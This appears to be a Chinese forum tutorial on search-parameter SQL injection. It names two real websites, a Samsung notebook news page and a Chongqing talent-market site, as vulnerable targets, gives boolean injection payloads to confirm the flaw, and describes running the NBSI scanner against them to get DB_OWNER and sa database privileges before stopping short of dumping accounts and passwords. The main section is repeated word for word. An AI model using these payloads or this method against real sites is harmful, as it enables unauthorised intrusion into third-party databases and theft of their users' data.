大家好 今天给大家做的教程是运用搜索性注入找到网站注入漏洞的方法 我是看了勇哥文章很受启发,想到有时打开网页的时候参数中一般不带有搜索的参数的,怎么办么?手工改造阿。呵呵
-----------------------------------------------------------------------
一般网站的搜索都是部分匹配的
有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx?page=1&type=product&ST=title&SC=
构造注入语句 三星%'and 1=1 and '%'='
三星%'and 1=2 and '%'='
大家看到了吧 两个返回页面是不一样的 说明有注入的漏洞 特征字 写 笔记本 就是三星%'and 1=1 and '%'=' 返回时有的
用nbsi吧 刚才就开始了 等等 DB_OWNER的权限
----------------------------------------------------------------------
然后再看看重庆人才市场的看看他的注入的页面
http://www.hrm.cq.cn/news.aspx?page=0&bt=安全
我们输入 安全%'and 1=1 and '%'='
在输入 安全%'and 1=2 and '%'='
看见了吧 两个页面是不一样的
特征字选 返回真页面有而返回加页面没有的 就选"通知"吧
因为时间关系 已经开始扫了
看见了吧 可是sa的权限阿 好多表呢 呵呵
因为只是检测一下,为大家提供一种思路 下面就是暴账号和密码
我就就不做了
-----------------------------------------------------------------------
一般网站的搜索都是部分匹配的
有漏洞的url是http://notebook.samsung.com.cn/news/news.aspx?page=1&type=product&ST=title&SC=
构造注入语句 三星%'and 1=1 and '%'='
三星%'and 1=2 and '%'='
大家看到了吧 两个返回页面是不一样的 说明有注入的漏洞 特征字 写 笔记本 就是三星%'and 1=1 and '%'=' 返回时有的
用nbsi吧 刚才就开始了 等等 DB_OWNER的权限
----------------------------------------------------------------------
然后再看看重庆人才市场的看看他的注入的页面
http://www.hrm.cq.cn/news.aspx?page=0&bt=安全
我们输入 安全%'and 1=1 and '%'='
在输入 安全%'and 1=2 and '%'='
看见了吧 两个页面是不一样的
特征字选 返回真页面有而返回加页面没有的 就选"通知"吧
因为时间关系 已经开始扫了
看见了吧 可是sa的权限阿 好多表呢 呵呵
因为只是检测一下,为大家提供一种思路 下面就是暴账号和密码
我就就不做了
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
